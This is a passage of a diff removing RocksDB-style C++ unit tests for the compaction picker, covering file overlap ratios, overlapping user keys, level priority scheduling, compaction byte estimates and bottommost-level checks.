-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Pick file 8 because it overlaps with 0 files on level 3.
-  ASSERT_EQ(8U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.target_file_size_base = 10000000;
-  mutable_cf_options_.target_file_size_multiplier = 10;
-  mutable_cf_options_.max_bytes_for_level_base = 10 * 1024 * 1024;
-
-  Add(2, 6U, "150", "175",
-      60000000U);  // Overlaps with file 26, 27, total size 521M
-  Add(2, 7U, "176", "200", 60000000U);  // Overlaps with file 27, 28, total size
-                                        // 520M, the smalelst overlapping
-  Add(2, 8U, "201", "300",
-      60000000U);  // Overlaps with file 28, 29, total size 521M
-
-  Add(3, 26U, "100", "110", 261000000U);
-  Add(3, 26U, "150", "170", 261000000U);
-  Add(3, 27U, "171", "179", 260000000U);
-  Add(3, 28U, "191", "220", 260000000U);
-  Add(3, 29U, "221", "300", 261000000U);
-  Add(3, 30U, "321", "400", 261000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Picking file 7 because overlapping ratio is the biggest.
-  ASSERT_EQ(7U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, CompactionPriMinOverlapping3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kMinOverlappingRatio;
-  mutable_cf_options_.max_bytes_for_level_base = 10000000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-
-  // file 7 and 8 over lap with the same file, but file 8 is smaller so
-  // it will be picked.
-  Add(2, 6U, "150", "167", 60000000U);  // Overlaps with file 26, 27
-  Add(2, 7U, "168", "169", 60000000U);  // Overlaps with file 27
-  Add(2, 8U, "201", "300", 61000000U);  // Overlaps with file 28, but the file
-                                        // itself is larger. Should be picked.
-
-  Add(3, 26U, "160", "165", 260000000U);
-  Add(3, 27U, "166", "170", 260000000U);
-  Add(3, 28U, "180", "400", 260000000U);
-  Add(3, 29U, "401", "500", 260000000U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  // Picking file 8 because overlapping ratio is the biggest.
-  ASSERT_EQ(8U, compaction->input(0, 0)->fd.GetNumber());
-}
-
-// This test exhibits the bug where we don't properly reset parent_index in
-// PickCompaction()
-TEST_F(CompactionPickerTest, ParentIndexResetBug) {
-  int num_levels = ioptions_.num_levels;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 200;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200");       // <- marked for compaction
-  Add(1, 3U, "400", "500", 600);  // <- this one needs compacting
-  Add(2, 4U, "150", "200");
-  Add(2, 5U, "201", "210");
-  Add(2, 6U, "300", "310");
-  Add(2, 7U, "400", "500");  // <- being compacted
-
-  vstorage_->LevelFiles(2)[3]->being_compacted = true;
-  vstorage_->LevelFiles(0)[0]->marked_for_compaction = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-}
-
-// This test checks ExpandWhileOverlapping() by having overlapping user keys
-// ranges (with different sequence numbers) in the input files.
-TEST_F(CompactionPickerTest, OverlappingUserKeys) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  ioptions_.compaction_pri = kByCompensatedSize;
-
-  Add(1, 1U, "100", "150", 1U);
-  // Overlapping user keys
-  Add(1, 2U, "200", "400", 1U);
-  Add(1, 3U, "400", "500", 1000000000U, 0, 0);
-  Add(2, 4U, "600", "700", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(1U, compaction->num_input_levels());
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1000000000U);
-  Add(1, 2U, "400", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "700", 1U, 0, 0);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(2U, compaction->num_input_files(0));
-  ASSERT_EQ(3U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(1, 1)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(1, 2)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Chain of overlapping user key ranges (forces ExpandWhileOverlapping() to
-  // expand multiple times)
-  Add(1, 1U, "100", "150", 1U);
-  Add(1, 2U, "150", "200", 1U, 0, 0);
-  Add(1, 3U, "200", "250", 1000000000U, 0, 0);
-  Add(1, 4U, "250", "300", 1U, 0, 0);
-  Add(1, 5U, "300", "350", 1U, 0, 0);
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "350", "400", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-              cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(5U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 3)->fd.GetNumber());
-  ASSERT_EQ(5U, compaction->input(0, 4)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys4) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_bytes_for_level_base = 1000000;
-
-  Add(1, 1U, "100", "150", 1U);
-  Add(1, 2U, "150", "199", 1U, 0, 0);
-  Add(1, 3U, "200", "250", 1100000U, 0, 0);
-  Add(1, 4U, "251", "300", 1U, 0, 0);
-  Add(1, 5U, "300", "350", 1U, 0, 0);
-
-  Add(2, 6U, "100", "115", 1U);
-  Add(2, 7U, "125", "325", 1U);
-  Add(2, 8U, "350", "400", 1U);
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys5) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1000000000U);
-  Add(1, 2U, "400", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "700", 1U, 0, 0);
-
-  vstorage_->LevelFiles(2)[2]->being_compacted = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys6) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1U, 0, 0);
-  Add(1, 2U, "401", "500", 1U, 0, 0);
-  Add(2, 3U, "000", "100", 1U);
-  Add(2, 4U, "100", "300", 1U, 0, 0);
-  Add(2, 5U, "305", "450", 1U, 0, 0);
-  Add(2, 6U, "460", "600", 1U, 0, 0);
-  Add(2, 7U, "600", "700", 1U, 0, 0);
-
-  vstorage_->LevelFiles(1)[0]->marked_for_compaction = true;
-  vstorage_->LevelFiles(1)[1]->marked_for_compaction = true;
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(3U, compaction->num_input_files(1));
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys7) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // Overlapping user keys on same level and output level
-  Add(1, 1U, "200", "400", 1U, 0, 0);
-  Add(1, 2U, "401", "500", 1000000000U, 0, 0);
-  Add(2, 3U, "100", "250", 1U);
-  Add(2, 4U, "300", "600", 1U, 0, 0);
-  Add(2, 5U, "600", "800", 1U, 0, 0);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_GE(1U, compaction->num_input_files(0));
-  ASSERT_GE(2U, compaction->num_input_files(1));
-  // File 5 has to be included in the compaction
-  ASSERT_EQ(5U, compaction->inputs(1)->back()->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys8) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up
-  // Expand input level as much as possible
-  // no overlapping case
-  Add(1, 1U, "101", "150", 1U);
-  Add(1, 2U, "151", "200", 1U);
-  Add(1, 3U, "201", "300", 1000000000U);
-  Add(1, 4U, "301", "400", 1U);
-  Add(1, 5U, "401", "500", 1U);
-  Add(2, 6U, "150", "200", 1U);
-  Add(2, 7U, "200", "450", 1U, 0, 0);
-  Add(2, 8U, "500", "600", 1U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(3U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(2U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys9) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-  // grow the number of inputs in "level" without
-  // changing the number of "level+1" files we pick up
-  // Expand input level as much as possible
-  // overlapping case
-  Add(1, 1U, "121", "150", 1U);
-  Add(1, 2U, "151", "200", 1U);
-  Add(1, 3U, "201", "300", 1000000000U);
-  Add(1, 4U, "301", "400", 1U);
-  Add(1, 5U, "401", "500", 1U);
-  Add(2, 6U, "100", "120", 1U);
-  Add(2, 7U, "150", "200", 1U);
-  Add(2, 8U, "200", "450", 1U, 0, 0);
-  Add(2, 9U, "501", "600", 1U);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(5U, compaction->num_input_files(0));
-  ASSERT_EQ(2U, compaction->num_input_files(1));
-  ASSERT_EQ(1U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(2U, compaction->input(0, 1)->fd.GetNumber());
-  ASSERT_EQ(3U, compaction->input(0, 2)->fd.GetNumber());
-  ASSERT_EQ(4U, compaction->input(0, 3)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-  ASSERT_EQ(8U, compaction->input(1, 1)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys10) {
-  // Locked file encountered when pulling in extra input-level files with same
-  // user keys. Verify we pick the next-best file from the same input level.
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  // file_number 2U is largest and thus first choice. But it overlaps with
-  // file_number 1U which is being compacted. So instead we pick the next-
-  // biggest file, 3U, which is eligible for compaction.
-  Add(1 /* level */, 1U /* file_number */, "100" /* smallest */,
-      "150" /* largest */, 1U /* file_size */);
-  file_map_[1U].first->being_compacted = true;
-  Add(1 /* level */, 2U /* file_number */, "150" /* smallest */,
-      "200" /* largest */, 1000000000U /* file_size */, 0 /* smallest_seq */,
-      0 /* largest_seq */);
-  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 900000000U /* file_size */);
-  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
-      "150" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "151" /* smallest */,
-      "200" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 1U /* file_size */);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(6U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, OverlappingUserKeys11) {
-  // Locked file encountered when pulling in extra output-level files with same
-  // user keys. Expected to skip that compaction and pick the next-best choice.
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.max_compaction_bytes = 100000000000u;
-
-  // score(L1) = 3.7
-  // score(L2) = 1.85
-  // There is no eligible file in L1 to compact since both candidates pull in
-  // file_number 5U, which overlaps with a file pending compaction (6U). The
-  // first eligible compaction is from L2->L3.
-  Add(1 /* level */, 2U /* file_number */, "151" /* smallest */,
-      "200" /* largest */, 1000000000U /* file_size */);
-  Add(1 /* level */, 3U /* file_number */, "201" /* smallest */,
-      "250" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 4U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 5000000000U /* file_size */);
-  Add(2 /* level */, 5U /* file_number */, "150" /* smallest */,
-      "201" /* largest */, 1U /* file_size */);
-  Add(2 /* level */, 6U /* file_number */, "201" /* smallest */,
-      "249" /* largest */, 1U /* file_size */, 0 /* smallest_seq */,
-      0 /* largest_seq */);
-  file_map_[6U].first->being_compacted = true;
-  Add(3 /* level */, 7U /* file_number */, "100" /* smallest */,
-      "149" /* largest */, 1U /* file_size */);
-
-  UpdateVersionStorageInfo();
-
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-  ASSERT_EQ(2U, compaction->num_input_levels());
-  ASSERT_EQ(1U, compaction->num_input_files(0));
-  ASSERT_EQ(1U, compaction->num_input_files(1));
-  ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber());
-  ASSERT_EQ(7U, compaction->input(1, 0)->fd.GetNumber());
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri1) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 total size 2GB, score 2.2. If one file being comapcted, score 1.1.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  file_map_[4u].first->being_compacted = true;
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // No compaction should be scheduled, if L0 has higher priority than L1
-  // but L0->L1 compaction is blocked by a file in L1 being compacted.
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() == nullptr);
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri2) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 total size 2GB, score 2.2. If one file being comapcted, score 1.1.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // If no file in L1 being compacted, L0->L1 compaction will be scheduled.
-  UpdateVersionStorageInfo();  // being_compacted flag is cleared here.
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-}
-
-TEST_F(CompactionPickerTest, NotScheduleL1IfL0WithHigherPri3) {
-  NewVersionStorage(6, kCompactionStyleLevel);
-  mutable_cf_options_.level0_file_num_compaction_trigger = 2;
-  mutable_cf_options_.max_bytes_for_level_base = 900000000U;
-
-  // 6 L0 files, score 3.
-  Add(0, 1U, "000", "400", 1U);
-  Add(0, 2U, "001", "400", 1U, 0, 0);
-  Add(0, 3U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 31U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 32U, "001", "400", 1000000000U, 0, 0);
-  Add(0, 33U, "001", "400", 1000000000U, 0, 0);
-
-  // L1 score more than 6.
-  Add(1, 4U, "050", "300", 1000000000U, 0, 0);
-  file_map_[4u].first->being_compacted = true;
-  Add(1, 5U, "301", "350", 1000000000U, 0, 0);
-  Add(1, 51U, "351", "400", 6000000000U, 0, 0);
-
-  // Output level overlaps with the beginning and the end of the chain
-  Add(2, 6U, "050", "100", 1U);
-  Add(2, 7U, "300", "400", 1U);
-
-  // If score in L1 is larger than L0, L1 compaction goes through despite
-  // there is pending L0 compaction.
-  UpdateVersionStorageInfo();
-  ASSERT_EQ(1, vstorage_->CompactionScoreLevel(0));
-  ASSERT_EQ(0, vstorage_->CompactionScoreLevel(1));
-  std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction(
-      cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_));
-  ASSERT_TRUE(compaction.get() != nullptr);
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded1) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 4;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 3U, "150", "200", 200);
-  // Level 1 is over target by 200
-  Add(1, 4U, "400", "500", 600);
-  Add(1, 5U, "600", "700", 600);
-  // Level 2 is less than target 10000 even added size of level 1
-  // Size ratio of L2/L1 is 9600 / 1200 = 8
-  Add(2, 6U, "150", "200", 2500);
-  Add(2, 7U, "201", "210", 2000);
-  Add(2, 8U, "300", "310", 2600);
-  Add(2, 9U, "400", "500", 2500);
-  // Level 3 exceeds target 100,000 of 1000
-  Add(3, 10U, "400", "500", 101000);
-  // Level 4 exceeds target 1,000,000 by 900 after adding size from level 3
-  // Size ratio L4/L3 is 9.9
-  // After merge from L3, L4 size is 1000900
-  Add(4, 11U, "400", "500", 999900);
-  Add(5, 11U, "400", "500", 8007200);
-
-  UpdateVersionStorageInfo();
-
-  ASSERT_EQ(200u * 9u + 10900u + 900u * 9,
-            vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded2) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 4U, "150", "200", 200);
-  Add(0, 5U, "150", "200", 200);
-  Add(0, 6U, "150", "200", 200);
-  // Level 1 size will be 1400 after merging with L0
-  Add(1, 7U, "400", "500", 200);
-  Add(1, 8U, "600", "700", 200);
-  // Level 2 is less than target 10000 even added size of level 1
-  Add(2, 9U, "150", "200", 9100);
-  // Level 3 over the target, but since level 4 is empty, we assume it will be
-  // a trivial move.
-  Add(3, 10U, "400", "500", 101000);
-
-  UpdateVersionStorageInfo();
-
-  // estimated L1->L2 merge: 400 * (9100.0 / 1400.0 + 1.0)
-  ASSERT_EQ(1400u + 3000u, vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeeded3) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = false;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-  Add(0, 1U, "150", "200", 2000);
-  Add(0, 2U, "150", "200", 2000);
-  Add(0, 4U, "150", "200", 2000);
-  Add(0, 5U, "150", "200", 2000);
-  Add(0, 6U, "150", "200", 1000);
-  // Level 1 size will be 10000 after merging with L0
-  Add(1, 7U, "400", "500", 500);
-  Add(1, 8U, "600", "700", 500);
-
-  Add(2, 9U, "150", "200", 10000);
-
-  UpdateVersionStorageInfo();
-
-  ASSERT_EQ(10000u + 18000u, vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, EstimateCompactionBytesNeededDynamicLevel) {
-  int num_levels = ioptions_.num_levels;
-  ioptions_.level_compaction_dynamic_level_bytes = true;
-  mutable_cf_options_.level0_file_num_compaction_trigger = 3;
-  mutable_cf_options_.max_bytes_for_level_base = 1000;
-  mutable_cf_options_.max_bytes_for_level_multiplier = 10;
-  NewVersionStorage(num_levels, kCompactionStyleLevel);
-
-  // Set Last level size 50000
-  // num_levels - 1 target 5000
-  // num_levels - 2 is base level with target 1000 (rounded up to
-  // max_bytes_for_level_base).
-  Add(num_levels - 1, 10U, "400", "500", 50000);
-
-  Add(0, 1U, "150", "200", 200);
-  Add(0, 2U, "150", "200", 200);
-  Add(0, 4U, "150", "200", 200);
-  Add(0, 5U, "150", "200", 200);
-  Add(0, 6U, "150", "200", 200);
-  // num_levels - 3 is over target by 100 + 1000
-  Add(num_levels - 3, 7U, "400", "500", 550);
-  Add(num_levels - 3, 8U, "600", "700", 550);
-  // num_levels - 2 is over target by 1100 + 200
-  Add(num_levels - 2, 9U, "150", "200", 5200);
-
-  UpdateVersionStorageInfo();
-
-  // Merging to the second last level: (5200 / 2100 + 1) * 1100
-  // Merging to the last level: (50000 / 6300 + 1) * 1300
-  ASSERT_EQ(2100u + 3823u + 11617u,
-            vstorage_->estimated_compaction_needed_bytes());
-}
-
-TEST_F(CompactionPickerTest, IsBottommostLevelTest) {
-  // case 1: Higher levels are empty
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  bool result =
-      Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // case 2: Higher levels have no overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "k", "p");
-  Add(3, 8U, "t", "w");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_TRUE(result);
-
-  // case 3.1: Higher levels (level 3) have overlap
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "e", "g");
-  Add(3, 8U, "h", "k");
-  Add(4, 9U, "a", "b");
-  Add(5, 10U, "c", "cc");
-  UpdateVersionStorageInfo();
-  SetCompactionInputFilesLevels(2, 1);
-  AddToCompactionFiles(3U);
-  AddToCompactionFiles(5U);
-  result = Compaction::TEST_IsBottommostLevel(2, vstorage_.get(), input_files_);
-  ASSERT_FALSE(result);
-
-  // case 3.2: Higher levels (level 5) have overlap
-  DeleteVersionStorage();
-  NewVersionStorage(6, kCompactionStyleLevel);
-  Add(0, 1U, "a", "m");
-  Add(0, 2U, "c", "z");
-  Add(1, 3U, "d", "e");
-  Add(1, 4U, "l", "p");
-  Add(2, 5U, "g", "i");
-  Add(2, 6U, "x", "z");
-  Add(3, 7U, "j", "k");
-  Add(3, 8U, "l", "m");
-  Add(4, 9U, "a", "b");
